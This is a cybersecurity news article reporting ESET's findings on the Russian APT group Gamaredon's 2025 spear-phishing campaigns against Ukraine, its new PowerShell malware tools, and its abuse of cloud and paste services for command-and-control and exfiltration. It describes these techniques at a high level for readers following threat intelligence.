Gamaredon Expands Ukraine Attacks with New Malware and Cloud Service Abuse

Gamaredon Expands Ukraine Attacks with New Malware and Cloud Service Abuse Ravie LakshmananJun 29, 2026Cloud Security / Malware A Russian advanced persistent threat (APT) group has continued to evolve and expand its malware arsenal as part of its ongoing cyber onslaught against Ukraine throughout 2025. Slovakian cybersecurity company ESET said it observed 35 distinct spear-phishing campaigns mounted by Gamaredon against new targets, with most of them taking place in the second half of the year. Primary targets of these efforts include Ukrainian governmental and military institutions. "Throughout 2025, Gamaredon stayed highly active and remained focused solely on Ukraine," ESET said. "The group's ultimate goal continues to be the exfiltration of sensitive information and other critical data that could be exploited to support Russian interests in the ongoing war in Ukraine." The spear-phishing campaigns make use of archive attachments or XHTML files that employ HTML smuggling to deliver malicious HTA downloaders that are responsible for dropping additional payloads, such as PteroSand. Some of the attacks have also weaponized a now-patched flaw in WinRAR (CVE-2025-8088) as a way of placing the malicious HTA downloader into the victim's Windows Startup folder. This, in turn, causes the downloader to be automatically executed on the next login, thereby adding a persistence mechanism to the compromise chain. Gamaredon's attacks are known to rely on weaponizers like PteroLNK and PteroPaste to facilitate lateral movement by infecting USB drives and network drives with malicious LNK files that, when opened by an unsuspecting user, trigger the retrieval of downloader malware. Also used is PteroSetup, an older Visual Basic Script (VBScript) weaponizer first detected in January 2021 and likely assumed to be discontinued. The tool scans USB and mapped network drives for legitimate installer files, and if found, replaces them with 7z self-extracting (SFX) archives containing the original installer and a malicious VBScript downloader. "In 2025, the group's reliance on third-party services grew significantly, with tunnel services and serverless worker platforms becoming an increasingly important part of how it hid its real back-end infrastructure," ESET said. The attacks are also characterized by the introduction of six new malicious PowerShell tools, broadening its custom malware arsenal - PteroDee and PteroCache for fetching and executing PowerShell payloads in memory PteroDum for fetching and executing VBScript payloads in memory PteroOdd for fetching a single PowerShell payload using the Telegra.ph API and likely used in campaigns in which the Gamaredon actors collaborated with Turla PteroEffigy for fetching the command-and-control (C2) server using the GoFile cloud storage service PteroPaste, for weaponizing USB drives and downloading additional PowerShell payloads via an encrypted channel “While the group took a short operational break in January 2025, Gamaredon spent much of its effort in the first half of that year developing and deploying new tools," ESET researcher Zoltán Rusnák said. "Many updates were made in the lead-up to major holidays in Russia and Crimea. Notably, no updates were observed during or immediately after these holidays, further suggesting that Gamaredon operators are probably government-affiliated employees." Another noteworthy aspect of the threat actor's campaign revolves around the use of a wide range of legitimate services as data exfiltration channels and dead drop resolvers to obtain details of the C2 server and to point malware to infrastructure already hidden behind tunnels or serverless workers. These include - Telegra.ph Teletype Rentry.co Write.as Dropbox GoFile DEV Community (dev.to) Mastodon Lesma Nopaste.net Paste.ee Wasabi Tebi Intercolo Dropbox "As in previous years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and an increasingly creative abuse of legitimate online services," ESET said. "Gamaredon further expanded its use of dead drops, tunnels, workers, dynamic DNS, and cloud storage, making its operations more flexible and harder to disrupt." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  Cloud security, Gamaredon, HTML Smuggling, Malware, powershell, Russia, Spear Phishing, Ukraine, WinRAR ⚡ Top Stories This Week Amadey and StealC Malware Network Disrupted, 27M Stolen Credentials Recovered Salesforce Disables Klue App Integration After OAuth Token Abuse Exposes Customer Data AutoJack Attack Lets One Web Page Hijack AI Agent for Host Code Execution New Gaslight macOS Malware Uses Prompt Injection to Disrupt AI-Assisted Analysis WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Tool ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More 29-Year-Old Squid Proxy Bug 'Squidbleed' Can Leak Cleartext HTTP Requests Chrome Ad Blocker with 10M+ Installs Found with Dormant Script Injection Capability F5 Patches Two Critical NGINX Open Source Flaws Enabling Remote Code Execution Fake AI Agent Skill Passed Security Scans and Reportedly Reached 26,000 Agents Cisco Catalyst SD-WAN Zero-Day CVE-2026-20245 Exploited to Gain Root Access CISA Warns Fortinet Customers as FortiBleed Hits 86,644 FortiGate Devices Unpatchable 'usbliter8' Exploit Breaks Apple A12 and A13 SecureROM Boot Chain Google Sets Sept. 30 Deadline for Android Developer Verification in Four Countries The Gentlemen RaaS Uses GentleKiller EDR Framework Targeting 400 Security Processes FortiBleed Targeted FortiGate Firewalls in 110 Million-Credential Harvesting Operation Load More ▼ ⭐ Featured Resources AI Can’t Stop Every Attack. Learn How Zero Trust Can Block What’s Unknown [Watch Demo] See Which Security Gaps Attackers Could Exploit First Get the 2026 Guide to Govern and Secure Enterprise AI Agents at Scale Have You Outgrown Your MDR? 7 Warning Signs Every CISO Should Check